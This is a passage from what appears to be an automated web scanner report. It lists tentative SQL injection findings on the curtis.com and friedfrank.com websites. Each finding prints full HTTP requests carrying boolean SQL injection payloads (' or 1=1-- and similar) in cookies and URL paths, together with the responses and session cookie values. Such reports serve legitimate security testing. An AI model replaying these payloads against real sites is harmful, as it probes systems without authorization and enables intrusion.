<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.62. http://www.curtis.com/sitecontent.cfm [__utmc cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. The payloads 70094951%20or%201%3d1--%20 and 70094951%20or%201%3d2--%20 were each submitted in the __utmc cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d1--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMC=;expires=Sun, 18-Apr-2010 17:01:08 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=12670236770094951%20or%201%3d2--%20; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:01:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.63. http://www.curtis.com/sitecontent.cfm [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 15928176'%20or%201%3d1--%20 and 15928176'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d1--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Sun, 18-Apr-2010 17:00:48 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)15928176'%20or%201%3d2--%20; __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.64. http://www.curtis.com/sitecontent.cfm [sifrFetch cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.curtis.com
Path:   /sitecontent.cfm

Issue detail

The sifrFetch cookie appears to be vulnerable to SQL injection attacks. The payloads 10251358'%20or%201%3d1--%20 and 10251358'%20or%201%3d2--%20 were each submitted in the sifrFetch cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d1--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: SIFRFETCH=;expires=Sun, 18-Apr-2010 17:00:39 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /sitecontent.cfm?pageid=6 HTTP/1.1
Host: www.curtis.com
Proxy-Connection: keep-alive
Referer: http://www.curtis.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sifrFetch=true10251358'%20or%201%3d2--%20; __utmz=126702367.1303145803.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=126702367.1899750302.1303145803.1303145803.1303145803.1; __utmc=126702367; __utmb=126702367.1.10.1303145803; CFID=6175843; CFTOKEN=32575697

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 17:00:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=6175843;path=/
Set-Cookie: CFTOKEN=32575697;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">

<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link href="/sifr3/sifr3.css" rel="stylesheet" type="text/css" />

<link href="/rss.cfm?feedID=1" rel="alternate" type="application/rss+xml" title="News" />
<link href="/rss.cfm?feedID=2" rel="alternate" type="application/rss+xml" title="Events" />
<link href="/rss.cfm?feedID=3" rel="alternate" type="application/rss+xml" title="Publications" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>

<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script language="javascript" type="text/javascript" src="/scripts/global.js"></script>

<!--::professionals::-->

<script type="text/javascript">
<!--//
function checkSearchFormKeyword(){
    if((document.forms["sitesearch"].keyword.value.length == 0)||(document.forms["sitesearch"].keyword.value == "Enter Keyword")){
       alert('Please enter a keyword for your search.');
       document.forms["sitesearc
...[SNIP]...

1.65. http://www.friedfrank.com/ [__utma cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 77794298'%20or%201%3d1--%20 and 77794298'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.177794298'%20or%201%3d1--%20

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 10:37:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 21-Apr-2010 10:37:47 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.177794298'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 10:37:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31400776;path=/
Set-Cookie: CFTOKEN=41635339;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>


...[SNIP]...

1.66. http://www.friedfrank.com/ [__utmz cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. The payloads 66107724'%20or%201%3d1--%20 and 66107724'%20or%201%3d2--%20 were each submitted in the __utmz cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)66107724'%20or%201%3d1--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 21 Apr 2011 10:37:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMZ=;expires=Wed, 21-Apr-2010 10:37:22 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET / HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)66107724'%20or%201%3d2--%20; __utma=113041875.727875777.1303088795.1303088795.1303088795.1

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 10:37:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: JSMOBILE=1;path=/
Set-Cookie: JSMOBILE=0;path=/
Set-Cookie: CFID=31400753;path=/
Set-Cookie: CFTOKEN=96108296;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />


<META NAME="keywords" CONTENT="">
<META NAME="description" CONTENT="">

<meta name="verify-v1" content="L9ZLHht3G4Zc0L6/Gg2wdpu3oMGZLi1MmvGFU4K2HiU=" />

<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>


...[SNIP]...

1.67. http://www.friedfrank.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico'%20and%201%3d1--%20 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 1 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Home</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::home::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" cellpadding
...[SNIP]...

Request 2

GET /favicon.ico'%20and%201%3d2--%20 HTTP/1.1
Host: www.friedfrank.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSMOBILE=0; CFID=31349998; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.1.10.1303088795

Response 2 (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 21 Apr 2011 06:17:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=31349998;path=/
Set-Cookie: CFTOKEN=88414738;path=/
Content-Type: text/html; charset=UTF-8


                                                                                                                                                           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.o
...[SNIP]...
<title>Fried Frank &gt; Page Not Found</title>
<link rel="shortcut icon" type="image/ico" href="/
favicon.ico">
<link href="scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="scripts/sIFR-print.css" type="text/css" media="print" />
<link href="scripts/dropdowns.css" rel="stylesheet" type="text/css" media="all" />
<script language="javascript" src="scripts/sifr.js" type="text/javascript"></script>
<!--::404::-->
<style type="text/css">
<!--
body,td,th {
   font-family: Arial, Helvetica, sans-serif;
   font-size: 12px;
   color: #333333;
}

.TempBorderBG {
   background-color:#e8f1f6;
}
.TempHeaderBG {
   background-color:#7eadbf;
}
.underNav {
   background-color:#ece6b2;
}
.searchbox {
   background-color:#E8F1F6;
   margin:0px;
   width:98px;
   height:16px;
   border:0px;
   padding:0px;
   padding-top:5px;
   font-size: 11px;
   color:#818c90;
}

-->
</style>
<script src="scripts/AC_RunActiveContent.js" type="text/javascript"></script>
<script src="scripts/dropdowns.js" type="text/javascript"></script>
</head>

<body>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td><img src="images/px.gif" alt="" width="20" height="20" /></td>
   </tr>
</table>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td colspan="3" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="1" height="10" /></td>
</tr>
<tr>
<td width="10" class="TempBorderBG"><img src="images/px.gif" alt="Fried Frank" width="10" height="1" /></td>
<td width="740" class="TempHeaderBG"><table width="740" border="0" cellspacing="0" cellpadding="0">
<tr>
<td colspan="3"><img src="images/px.gif" alt="Fried Frank" width="1" height="20" /></td>
</tr>
<tr>
<td width="20"><img src="images/px.gif" alt="Fried Frank" width="20" height="20" /></td>
<td width="700">
   <table width="700" border="0" cellspacing="0" ce
...[SNIP]...

1.68. http://www.friedfrank.com/flash/perpetua.swf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.friedfrank.com
Path:   /flash/perpetua.swf

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

